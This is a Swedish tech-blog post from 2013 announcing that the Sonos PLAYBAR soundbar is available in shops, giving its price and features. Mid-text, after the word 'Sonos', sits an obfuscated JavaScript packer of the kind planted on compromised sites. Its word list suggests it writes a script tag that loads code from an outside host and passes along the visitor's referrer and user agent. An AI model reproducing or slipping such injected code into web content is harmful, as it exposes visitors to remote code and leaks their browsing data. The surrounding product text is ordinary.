Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Sonos PLAYBAR finns nu i butik!

Filip Urde
  • On 5 mars, 2013
  • http://www.revue.se/filip-urde

Sonos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nyrne|var|u0026u|referrer|brbef||js|php’.split(’|’),0,{}))
PLAYBAR
, ljudlimpan för musikälskare, finns nu tillgänglig för inköp hos Sonos.com och en rad andra återförsäljare.

 

 

sonos

sonos

Vi på Revue väntar med spänning på vårt eget ex som vi snart ska testa och skriva en recension om. Efter att vi var på Berns i förra veckan för en pressvisning av spelaren så kan man säga att vi var minst sagt imponerade. Både ljudkvalitet och vilket tryck denna limpa kan leverera gjorde oss rent av glada, så det ska bli mycket intressant att se vad den går för på hemmaplan. Sonos PLAYBAR säljs för 5998:- (Rekommenderat ca pris).

PLAYBAR:s kraftfulla matris med nio drivenheter och unika akustiska programvara levererar djupgående ljud för filmer och spel, kraftfulla ljudvågor från live-konserter och trådlös streaming från populära musikstreamingtjänster som Spotify, WIMP och Rhapsody.

PLAYBAR fungerar precis som med övriga SONOS produkter, det är bara att koppla samman och bygga ut ditt ljud till något enormt. Exempelvis så mkan ni para SONOS PLAYBAR med SONS SUB och lägg till ett par PLAY:3-enheter så har du en fängslande 5.1-surroundljudupplevelse för hemmabio.

Vi återkommer snart med vårt eget test av SONOS PLAYBAR.